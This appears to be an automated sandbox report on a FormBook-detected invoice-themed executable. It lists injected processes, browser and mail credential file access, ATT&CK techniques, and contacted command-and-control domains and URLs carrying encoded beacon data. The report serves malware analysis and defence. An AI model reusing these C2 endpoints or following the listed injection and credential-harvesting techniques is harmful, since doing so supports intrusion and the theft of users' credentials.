            Source: C:\Windows\SysWOW64\TapiUnattend.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
            Source: NVOICE FOR THE MONTH OF AUG-24.exe, tStjsTMXwkdtbv.exe, 00000005.00000000.2059745280.0000000000B90000.00000002.00000001.00040000.00000000.sdmp, tStjsTMXwkdtbv.exe, 00000005.00000002.4158916964.0000000000B91000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: tStjsTMXwkdtbv.exe, 00000005.00000000.2059745280.0000000000B90000.00000002.00000001.00040000.00000000.sdmp, tStjsTMXwkdtbv.exe, 00000005.00000002.4158916964.0000000000B91000.00000002.00000001.00040000.00000000.sdmp, tStjsTMXwkdtbv.exe, 00000007.00000000.2234045129.0000000001500000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: tStjsTMXwkdtbv.exe, 00000005.00000000.2059745280.0000000000B90000.00000002.00000001.00040000.00000000.sdmp, tStjsTMXwkdtbv.exe, 00000005.00000002.4158916964.0000000000B91000.00000002.00000001.00040000.00000000.sdmp, tStjsTMXwkdtbv.exe, 00000007.00000000.2234045129.0000000001500000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: tStjsTMXwkdtbv.exe, 00000005.00000000.2059745280.0000000000B90000.00000002.00000001.00040000.00000000.sdmp, tStjsTMXwkdtbv.exe, 00000005.00000002.4158916964.0000000000B91000.00000002.00000001.00040000.00000000.sdmp, tStjsTMXwkdtbv.exe, 00000007.00000000.2234045129.0000000001500000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: NVOICE FOR THE MONTH OF AUG-24.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4158565810.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4159371435.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2145065547.0000000008C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2140144317.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4158281170.0000000002C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2139429646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4159290006.0000000003730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4161197958.00000000052B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\TapiUnattend.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: NVOICE FOR THE MONTH OF AUG-24.exeBinary or memory string: WIN_XP
            Source: NVOICE FOR THE MONTH OF AUG-24.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
            Source: NVOICE FOR THE MONTH OF AUG-24.exeBinary or memory string: WIN_XPe
            Source: NVOICE FOR THE MONTH OF AUG-24.exeBinary or memory string: WIN_VISTA
            Source: NVOICE FOR THE MONTH OF AUG-24.exeBinary or memory string: WIN_7
            Source: NVOICE FOR THE MONTH OF AUG-24.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4158565810.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4159371435.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2145065547.0000000008C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2140144317.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4158281170.0000000002C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2139429646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4159290006.0000000003730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4161197958.00000000052B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
            Source: C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts
            2
            Native API
            1
            DLL Side-Loading
            1
            Exploitation for Privilege Escalation
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services1
            Archive Collected Data
            4
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts
            1
            Abuse Elevation Control Mechanism
            1
            Deobfuscate/Decode Files or Information
            21
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            1
            Abuse Elevation Control Mechanism
            Security Account Manager2
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts
            3
            Obfuscated Files or Information
            NTDS16
            System Information Discovery
            Distributed Component Object Model21
            Input Capture
            4
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation
            1
            DLL Side-Loading
            LSA Secrets141
            Security Software Discovery
            SSH3
            Clipboard Data
            Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection
            2
            Valid Accounts
            Cached Domain Credentials2
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion
            DCSync3
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation
            Proc Filesystem11
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1519458 Sample: NVOICE FOR THE MONTH OF AUG... Startdate: 26/09/2024 Architecture: WINDOWS Score: 100 28 www.whats-in-the-box.org 2->28 30 www.weatherbook.live 2->30 32 21 other IPs or domains 2->32 42 Malicious sample detected (through community Yara rule) 2->42 44 Antivirus / Scanner detection for submitted sample 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 4 other signatures 2->48 10 NVOICE FOR THE MONTH OF AUG-24.exe 1 2->10         started        signatures3 process4 signatures5 60 Writes to foreign memory regions 10->60 62 Maps a DLL or memory area into another process 10->62 13 svchost.exe 10->13         started        process6 signatures7 64 Maps a DLL or memory area into another process 13->64 16 tStjsTMXwkdtbv.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 TapiUnattend.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 tStjsTMXwkdtbv.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 zhs.zohosites.com 136.143.186.12, 49760, 49761, 49762 ZOHO-ASUS United States 22->34 36 www.shanhaiguan.net 156.242.132.82, 49756, 49757, 49758 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles 22->36 38 6 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            NVOICE FOR THE MONTH OF AUG-24.exe53%ReversingLabsWin32.Backdoor.FormBook
            NVOICE FOR THE MONTH OF AUG-24.exe100%AviraHEUR/AGEN.1321671
            NVOICE FOR THE MONTH OF AUG-24.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            http://www.lanxuanz.tech/ivo1/?IH=BP3PrJvHc6MXcF&wrRLLPUh=fL7FGqwZgFyeKETJ58v2LpmodVM6vZtD0XO9xnYIy5nXxzuHXVLl0+u5SqQtPDeu0FT/+Cn/ojl8jT3mUhnhpKNreTIBn1GsPPCO7XuNhO+zSMbYdoB0rmQ=0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            http://www.crowsecurity.cloud/jvjp/0%Avira URL Cloudsafe
            http://www.o731lh.vip/2mtz/?IH=BP3PrJvHc6MXcF&wrRLLPUh=IfYyAdGVqG15+W1eWJCxS0ORt4nu6IY1D62BdBAlUg+344eMNCzJLfy5jwznGJhpNs/P9siyZSS4xk9tvxK5ee8p4hJaGD9LflzCx/QbEnNrt30eVgRceG0=0%Avira URL Cloudsafe
            http://www.inspireplay.live/p8sm/0%Avira URL Cloudsafe
            https://www.zoho.com/sites/images/professionally-crafted-themes.png0%Avira URL Cloudsafe
            http://www.selftip.top/85su/?wrRLLPUh=+3B6fjGs9Z40sbhWxh4Olw8ODpxTfKIF4isjbFYKdetJPWg+iKgIwujGEU5yKjzj4BkeFS8xvi4EjdbOtsLgFdPJH1ajNMdDlKenjZRhD3fwrVi0trMy8bo=&IH=BP3PrJvHc6MXcF0%Avira URL Cloudsafe
            http://www.turbonotes.app/yvck/0%Avira URL Cloudsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.newdaydawning.net/72tr/?wrRLLPUh=QZWebiUhaLdmwus6tw46di6RDKjv7nbCBMEilCJ9bJwWpmwjRhGQJpTR6+hRUKDDRrrjNlIlSQ84SzFoivqKQb5yDyJKTfd8P5RA0nco9Gqas/wnYV+AlJk=&IH=BP3PrJvHc6MXcF0%Avira URL Cloudsafe
            http://www.newdaydawning.net/72tr/0%Avira URL Cloudsafe
            https://www.zoho.com/sites/?src=parkeddomain&dr=www.lanxuanz.tech0%Avira URL Cloudsafe
            http://www.aaavvejibej.bond/lpl9/?wrRLLPUh=e8lWkFdpBI8fMqvrlwy/onG3BcZVz7zQmYaHg/xvgOUuLw6B3kGtYYWM8/CK9QzH2IDr1kJuLXtu8i/nZF8LLdKb2VMPvKTLf5QxvZUWo2Nd+FhaQzJMI4o=&IH=BP3PrJvHc6MXcF0%Avira URL Cloudsafe
            http://www.wajf.net/zl4r/?wrRLLPUh=qAyzze+7Xxv+wA09CtJQAc1N08fgxsYjMF3PXk0d3f7QX0q4Jz2C7sJqIlEgcTB+GqBDI184c5mD0TMdCmIzOUWEYKg5UaPGXuwVBW400SE67lweB1cXDRo=&IH=BP3PrJvHc6MXcF0%Avira URL Cloudsafe
            http://www.lanxuanz.tech/ivo1/0%Avira URL Cloudsafe
            http://www.selftip.top/85su/0%Avira URL Cloudsafe
            http://www.o731lh.vip/2mtz/0%Avira URL Cloudsafe
            http://www.weatherbook.live/4hiy/0%Avira URL Cloudsafe
            http://www.turbonotes.app0%Avira URL Cloudsafe
            http://www.crowsecurity.cloud/jvjp/?wrRLLPUh=4b5MqvIelA8yeSWKDPRIdHesNV5XUrpBTJ6STZ7OqVlET0aP4dQGxyJ8Yal1yomp/rzgkCoCCWVuqR9lxGRqCv57Hh5Ivk5Sj0mDZDuer/ujvu4zkb6QZi8=&IH=BP3PrJvHc6MXcF0%Avira URL Cloudsafe
            http://www.wajf.net/zl4r/0%Avira URL Cloudsafe
            http://newdaydawning.net/72tr/?wrRLLPUh=QZWebiUhaLdmwus6tw46di6RDKjv7nbCBMEilCJ9bJwWpmwjRhGQJpTR60%Avira URL Cloudsafe
            http://www.weatherbook.live/4hiy/?wrRLLPUh=x7+2I8SGsUecCMiSjTFbl5lp6Hdc+2w1VtibsJt/MsyL3kCUaBIR7/SGJ6EjRkH0LM2kKQMRMq/OnwKr8gWiX4rGIBeWvoECrZmU86sauZftBWicToOcLZk=&IH=BP3PrJvHc6MXcF0%Avira URL Cloudsafe
            http://www.shanhaiguan.net/p2q3/0%Avira URL Cloudsafe
            http://www.whats-in-the-box.org/30jd/0%Avira URL Cloudsafe
            https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb0%Avira URL Cloudsafe
            http://www.inspireplay.live/p8sm/?IH=BP3PrJvHc6MXcF&wrRLLPUh=gudxXcfIjfM6RSgjlHSXwEEWc2+zEXg0KLmBWaNcxhhcux8g2aNs+kqO3FQMDVnLkpHMsugYGQwIm+gz0yjubt2jusNNuut2QLx2iafcYqdrxcPN6iJJGks=0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            webredir.vip.gandi.net
            217.70.184.50
            truefalse
              unknown
              crowsecurity.cloud
              3.33.130.190
              truefalse
                unknown
                inspireplay.live
                3.33.130.190
                truefalse
                  unknown
                  zhs.zohosites.com
                  136.143.186.12
                  truefalse
                    unknown
                    o731lh.vip
                    3.33.130.190
                    truefalse
                      unknown
                      www.aaavvejibej.bond
                      172.67.181.150
                      truefalse
                        unknown
                        weatherbook.live
                        3.33.130.190
                        truefalse
                          unknown
                          newdaydawning.net
                          44.213.25.70
                          truefalse
                            unknown
                            www.selftip.top
                            199.192.21.169
                            truefalse
                              unknown
                              whats-in-the-box.org
                              3.33.130.190
                              truefalse
                                unknown
                                www.shanhaiguan.net
                                156.242.132.82
                                truefalse
                                  unknown
                                  cdl-lb-1356093980.us-east-1.elb.amazonaws.com
                                  44.207.39.65
                                  truefalse
                                    unknown
                                    www.inspireplay.live
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.kfowks.site
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.o731lh.vip
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.turbonotes.app
                                          unknown
                                          unknowntrue
                                            unknown
                                            www.weatherbook.live
                                            unknown
                                            unknowntrue
                                              unknown
                                              www.crowsecurity.cloud
                                              unknown
                                              unknowntrue
                                                unknown
                                                www.newdaydawning.net
                                                unknown
                                                unknowntrue
                                                  unknown
                                                  www.whats-in-the-box.org
                                                  unknown
                                                  unknowntrue
                                                    unknown
                                                    www.lanxuanz.tech
                                                    unknown
                                                    unknowntrue
                                                      unknown
                                                      www.wajf.net
                                                      unknown
                                                      unknowntrue
                                                        unknown
                                                        NameMaliciousAntivirus DetectionReputation
                                                        http://www.crowsecurity.cloud/jvjp/false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.lanxuanz.tech/ivo1/?IH=BP3PrJvHc6MXcF&wrRLLPUh=fL7FGqwZgFyeKETJ58v2LpmodVM6vZtD0XO9xnYIy5nXxzuHXVLl0+u5SqQtPDeu0FT/+Cn/ojl8jT3mUhnhpKNreTIBn1GsPPCO7XuNhO+zSMbYdoB0rmQ=false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.newdaydawning.net/72tr/false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.selftip.top/85su/?wrRLLPUh=+3B6fjGs9Z40sbhWxh4Olw8ODpxTfKIF4isjbFYKdetJPWg+iKgIwujGEU5yKjzj4BkeFS8xvi4EjdbOtsLgFdPJH1ajNMdDlKenjZRhD3fwrVi0trMy8bo=&IH=BP3PrJvHc6MXcFfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.inspireplay.live/p8sm/false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.o731lh.vip/2mtz/?IH=BP3PrJvHc6MXcF&wrRLLPUh=IfYyAdGVqG15+W1eWJCxS0ORt4nu6IY1D62BdBAlUg+344eMNCzJLfy5jwznGJhpNs/P9siyZSS4xk9tvxK5ee8p4hJaGD9LflzCx/QbEnNrt30eVgRceG0=false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.turbonotes.app/yvck/false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.newdaydawning.net/72tr/?wrRLLPUh=QZWebiUhaLdmwus6tw46di6RDKjv7nbCBMEilCJ9bJwWpmwjRhGQJpTR6+hRUKDDRrrjNlIlSQ84SzFoivqKQb5yDyJKTfd8P5RA0nco9Gqas/wnYV+AlJk=&IH=BP3PrJvHc6MXcFfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.lanxuanz.tech/ivo1/false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.aaavvejibej.bond/lpl9/?wrRLLPUh=e8lWkFdpBI8fMqvrlwy/onG3BcZVz7zQmYaHg/xvgOUuLw6B3kGtYYWM8/CK9QzH2IDr1kJuLXtu8i/nZF8LLdKb2VMPvKTLf5QxvZUWo2Nd+FhaQzJMI4o=&IH=BP3PrJvHc6MXcFfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.wajf.net/zl4r/?wrRLLPUh=qAyzze+7Xxv+wA09CtJQAc1N08fgxsYjMF3PXk0d3f7QX0q4Jz2C7sJqIlEgcTB+GqBDI184c5mD0TMdCmIzOUWEYKg5UaPGXuwVBW400SE67lweB1cXDRo=&IH=BP3PrJvHc6MXcFfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.o731lh.vip/2mtz/false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.selftip.top/85su/false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.crowsecurity.cloud/jvjp/?wrRLLPUh=4b5MqvIelA8yeSWKDPRIdHesNV5XUrpBTJ6STZ7OqVlET0aP4dQGxyJ8Yal1yomp/rzgkCoCCWVuqR9lxGRqCv57Hh5Ivk5Sj0mDZDuer/ujvu4zkb6QZi8=&IH=BP3PrJvHc6MXcFfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.weatherbook.live/4hiy/false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.wajf.net/zl4r/false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.whats-in-the-box.org/30jd/false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.weatherbook.live/4hiy/?wrRLLPUh=x7+2I8SGsUecCMiSjTFbl5lp6Hdc+2w1VtibsJt/MsyL3kCUaBIR7/SGJ6EjRkH0LM2kKQMRMq/OnwKr8gWiX4rGIBeWvoECrZmU86sauZftBWicToOcLZk=&IH=BP3PrJvHc6MXcFfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.shanhaiguan.net/p2q3/false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.inspireplay.live/p8sm/?IH=BP3PrJvHc6MXcF&wrRLLPUh=gudxXcfIjfM6RSgjlHSXwEEWc2+zEXg0KLmBWaNcxhhcux8g2aNs+kqO3FQMDVnLkpHMsugYGQwIm+gz0yjubt2jusNNuut2QLx2iafcYqdrxcPN6iJJGks=false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://duckduckgo.com/chrome_newtabTapiUnattend.exe, 00000006.00000003.2352307459.0000000007D5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://duckduckgo.com/ac/?q=TapiUnattend.exe, 00000006.00000003.2352307459.0000000007D5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoTapiUnattend.exe, 00000006.00000003.2352307459.0000000007D5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://www.zoho.com/sites/images/professionally-crafted-themes.pngTapiUnattend.exe, 00000006.00000002.4160033591.0000000004870000.00000004.10000000.00040000.00000000.sdmp, tStjsTMXwkdtbv.exe, 00000007.00000002.4159489695.0000000003BD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=TapiUnattend.exe, 00000006.00000003.2352307459.0000000007D5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=TapiUnattend.exe, 00000006.00000003.2352307459.0000000007D5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.ecosia.org/newtab/TapiUnattend.exe, 00000006.00000003.2352307459.0000000007D5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.zoho.com/sites/?src=parkeddomain&dr=www.lanxuanz.techTapiUnattend.exe, 00000006.00000002.4160033591.0000000004870000.00000004.10000000.00040000.00000000.sdmp, tStjsTMXwkdtbv.exe, 00000007.00000002.4159489695.0000000003BD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
